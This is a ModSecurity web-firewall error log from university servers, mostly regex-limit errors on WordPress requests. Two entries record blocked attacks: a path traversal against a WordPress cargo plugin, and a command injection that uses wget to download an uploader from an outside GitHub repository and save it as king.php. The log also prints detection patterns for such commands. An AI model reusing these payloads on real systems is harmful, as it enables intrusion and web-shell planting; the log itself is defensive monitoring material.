[Tue Aug 29 09:26:59.273479 2023] [:error] [pid 63508] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/dist/url.min.js"] [unique_id "ZO1Xc8Co-f0AAPgUgwsAAAAR"]
[Tue Aug 29 09:26:59.276071 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/site-health.min.js"] [unique_id "ZO1Xc8Co-f0AAPgW9xIAAAAU"]
[Tue Aug 29 09:26:59.276129 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/site-health.min.js"] [unique_id "ZO1Xc8Co-f0AAPgW9xIAAAAU"]
[Tue Aug 29 09:26:59.294589 2023] [:error] [pid 63508] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/wp-ajax-response.min.js"] [unique_id "ZO1Xc8Co-f0AAPgUgwwAAAAR"]
[Tue Aug 29 09:26:59.301431 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/jquery/jquery.color.min.js"] [unique_id "ZO1Xc8Co-f0AAPgW9xMAAAAU"]
[Tue Aug 29 09:26:59.308039 2023] [:error] [pid 63511] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/wp-lists.min.js"] [unique_id "ZO1Xc8Co-f0AAPgXNjUAAAAV"]
[Tue Aug 29 09:26:59.317282 2023] [:error] [pid 63508] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/quicktags.min.js"] [unique_id "ZO1Xc8Co-f0AAPgUgw0AAAAR"]
[Tue Aug 29 09:26:59.324614 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/jquery/jquery.query.js"] [unique_id "ZO1Xc8Co-f0AAPgW9xQAAAAU"]
[Tue Aug 29 09:26:59.343835 2023] [:error] [pid 63511] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/postbox.min.js"] [unique_id "ZO1Xc8Co-f0AAPgXNjYAAAAV"]
[Tue Aug 29 09:26:59.343909 2023] [:error] [pid 63511] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/postbox.min.js"] [unique_id "ZO1Xc8Co-f0AAPgXNjYAAAAV"]
[Tue Aug 29 09:26:59.344624 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/edit-comments.min.js"] [unique_id "ZO1Xc8Co-f0AAPgTye0AAAAQ"]
[Tue Aug 29 09:26:59.344720 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/edit-comments.min.js"] [unique_id "ZO1Xc8Co-f0AAPgTye0AAAAQ"]
[Tue Aug 29 09:26:59.357515 2023] [:error] [pid 63508] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/dist/date.min.js"] [unique_id "ZO1Xc8Co-f0AAPgUgw4AAAAR"]
[Tue Aug 29 09:26:59.357553 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/dist/vendor/moment.min.js"] [unique_id "ZO1Xc8Co-f0AAPgD0cYAAAAO"]
[Tue Aug 29 09:26:59.358901 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/dashboard.min.js"] [unique_id "ZO1Xc8Co-f0AAPgW9xUAAAAU"]
[Tue Aug 29 09:26:59.359017 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/dashboard.min.js"] [unique_id "ZO1Xc8Co-f0AAPgW9xUAAAAU"]
[Tue Aug 29 09:26:59.364083 2023] [:error] [pid 63511] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/thickbox/thickbox.js"] [unique_id "ZO1Xc8Co-f0AAPgXNjcAAAAV"]
[Tue Aug 29 09:26:59.366816 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/wp-sanitize.min.js"] [unique_id "ZO1Xc8Co-f0AAPgTye4AAAAQ"]
[Tue Aug 29 09:26:59.367059 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/plugin-install.min.js"] [unique_id "ZO1Xc8Co-f0AAPgK@IIAAAAI"]
[Tue Aug 29 09:26:59.367116 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/plugin-install.min.js"] [unique_id "ZO1Xc8Co-f0AAPgK@IIAAAAI"]
[Tue Aug 29 09:26:59.379803 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/updates.min.js"] [unique_id "ZO1Xc8Co-f0AAPgD0ccAAAAO"]
[Tue Aug 29 09:26:59.379871 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/updates.min.js"] [unique_id "ZO1Xc8Co-f0AAPgD0ccAAAAO"]
[Tue Aug 29 09:26:59.382428 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/media-upload.min.js"] [unique_id "ZO1Xc8Co-f0AAPgW9xYAAAAU"]
[Tue Aug 29 09:26:59.382495 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/media-upload.min.js"] [unique_id "ZO1Xc8Co-f0AAPgW9xYAAAAU"]
[Tue Aug 29 09:26:59.387361 2023] [:error] [pid 63511] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/jquery/ui/accordion.min.js"] [unique_id "ZO1Xc8Co-f0AAPgXNjgAAAAV"]
[Tue Aug 29 09:26:59.393643 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/wplink.min.js"] [unique_id "ZO1Xc8Co-f0AAPgK@IMAAAAI"]
[Tue Aug 29 09:26:59.397016 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/jquery/ui/menu.min.js"] [unique_id "ZO1Xc8Co-f0AAPgTye8AAAAQ"]
[Tue Aug 29 09:26:59.402315 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/jquery/ui/autocomplete.min.js"] [unique_id "ZO1Xc8Co-f0AAPgD0cgAAAAO"]
[Tue Aug 29 09:26:59.723340 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/thickbox/loadingAnimation.gif"] [unique_id "ZO1Xc8Co-f0AAPgTyfAAAAAQ"]
[Tue Aug 29 09:26:59.723437 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Xc8Co-f0AAPgD0ckAAAAO"]
[Tue Aug 29 09:26:59.723495 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Xc8Co-f0AAPgD0ckAAAAO"]
[Tue Aug 29 09:26:59.746864 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Xc8Co-f0AAPgTyfEAAAAQ"]
[Tue Aug 29 09:26:59.746923 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Xc8Co-f0AAPgTyfEAAAAQ"]
[Tue Aug 29 09:27:59.755338 2023] [:error] [pid 63494] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Xr8Co-f0AAPgGYj0AAAAC"]
[Tue Aug 29 09:27:59.755474 2023] [:error] [pid 63494] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Xr8Co-f0AAPgGYj0AAAAC"]
[Tue Aug 29 09:29:33.545515 2023] [:error] [pid 63593] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi-bin/mt/mt-xmlrpc.cgi"] [unique_id "ZO1YDcCo-f0AAPhpKQgAAAAP"]
[Tue Aug 29 09:29:41.053723 2023] [:error] [pid 63523] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/mt/mt-xmlrpc.cgi"] [unique_id "ZO1YFcCo-f0AAPgjvvYAAAAc"]
[Tue Aug 29 09:29:44.381270 2023] [:error] [pid 63494] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi-bin/mt-xmlrpc.cgi"] [unique_id "ZO1YGMCo-f0AAPgGYlMAAAAC"]
[Tue Aug 29 09:29:46.326265 2023] [:error] [pid 63598] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/mt-xmlrpc.cgi"] [unique_id "ZO1YGsCo-f0AAPhuAi4AAAAD"]
[Tue Aug 29 09:29:48.556947 2023] [:error] [pid 63492] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi-bin/MT/mt-xmlrpc.cgi"] [unique_id "ZO1YHMCo-f0AAPgEgyYAAAAZ"]
[Tue Aug 29 09:29:50.933456 2023] [:error] [pid 63493] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/MT/mt-xmlrpc.cgi"] [unique_id "ZO1YHsCo-f0AAPgFsmgAAAAA"]
[Tue Aug 29 09:29:52.969189 2023] [:error] [pid 63494] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/mtos/mt-xmlrpc.cgi"] [unique_id "ZO1YIMCo-f0AAPgGYlQAAAAC"]
[Tue Aug 29 09:29:54.916192 2023] [:error] [pid 63493] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cms/mt-xmlrpc.cgi"] [unique_id "ZO1YIsCo-f0AAPgFsmkAAAAA"]
[Tue Aug 29 09:29:59.765006 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1YJ8Co-f0AAPgEgycAAAAZ"]
[Tue Aug 29 09:29:59.765146 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1YJ8Co-f0AAPgEgycAAAAZ"]
[Tue Aug 29 09:30:23.112083 2023] [:error] [pid 63522] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/blog/mt-xmlrpc.cgi"] [unique_id "ZO1YP8Co-f0AAPgiZkIAAAAb"]
[Tue Aug 29 09:30:56.284275 2023] [:error] [pid 63522] [client 68.219.104.180] ModSecurity: Rule 7fe1c6b1bef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi/mt-xmlrpc.cgi"] [unique_id "ZO1YYMCo-f0AAPgiZkMAAAAb"]
[Tue Aug 29 09:30:59.760953 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1YY8Co-f0AAPgEgykAAAAZ"]
[Tue Aug 29 09:30:59.761104 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1YY8Co-f0AAPgEgykAAAAZ"]
[Tue Aug 29 09:32:59.772070 2023] [:error] [pid 63589] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Y28Co-f0AAPhlEmMAAAAE"]
[Tue Aug 29 09:32:59.772157 2023] [:error] [pid 63589] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Y28Co-f0AAPhlEmMAAAAE"]
[Tue Aug 29 09:34:59.784639 2023] [:error] [pid 63534] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1ZU8Co-f0AAPgu7lMAAAAB"]
[Tue Aug 29 09:34:59.784721 2023] [:error] [pid 63534] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1ZU8Co-f0AAPgu7lMAAAAB"]
[Tue Aug 29 09:35:48.053247 2023] [:error] [pid 63613] [client 68.219.104.180] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:filepath: ../../../x.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "ZO1ZhMCo-f0AAPh9tYQAAAAQ"]
[Tue Aug 29 09:35:51.554959 2023] [:error] [pid 63590] [client 68.219.104.180] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/raw.githubusercontent.com/tanjim530/Private_exploit/main/uploader.txt -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/x.php"] [unique_id "ZO1Zh8Co-f0AAPhmxnwAAAAG"]
[Tue Aug 29 09:36:34.919169 2023] [:error] [pid 63692] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:par_ambil. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS:par_ambil: 20222x55201x41155050160181x15500211012x-x553109x0x-xx-x;20222x55201x41155050160181x505212012x-x553109x0x-xx-x;20222x55201x41155050160181x505231423x-x553109x0x-xx-x;20222x55201x41155050160181x505231431x-x553109x0x-xx-x;20222x55201x41155050160181x505232083x-x553109x0x-xx-x;20222x55201x41155050160181xTIF21032x-x553109x0x-xx-x;20222x55201x41155050160181xTIF21082x-x553109x0x-xx-x;20222x55201x41155050160181xTIF2112x-x553109x0x-xx-x;20222x55201x41155050160181xTIF2204..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_C [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpanambilsks"] [unique_id "ZO1ZssCo-f0AAPjMtc4AAAAn"]
[Tue Aug 29 09:36:49.097321 2023] [:error] [pid 63692] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:par_ambil. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS:par_ambil: 20222x55201x41155050160181x15500211012x-x553109x0x-xx-x;20222x55201x41155050160181x505212012x-x553109x0x-xx-x;20222x55201x41155050160181x505231423x-x553109x0x-xx-x;20222x55201x41155050160181x505231431x-x553109x0x-xx-x;20222x55201x41155050160181x505232083x-x553109x0x-xx-x;20222x55201x41155050160181xTIF21032x-x553109x0x-xx-x;20222x55201x41155050160181xTIF21082x-x553109x0x-xx-x;20222x55201x41155050160181xTIF2112x-x553109x0x-xx-x;20222x55201x41155050160181xTIF2204..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_C [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpanambilsks"] [unique_id "ZO1ZwcCo-f0AAPjMtc8AAAAn"]
[Tue Aug 29 09:36:58.161349 2023] [:error] [pid 63681] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:tglkuitansi. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS:tglkuitansi: 2023-08-29T00:00:00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/save"] [unique_id "ZO1ZysCo-f0AAPjBYk8AAAAG"]
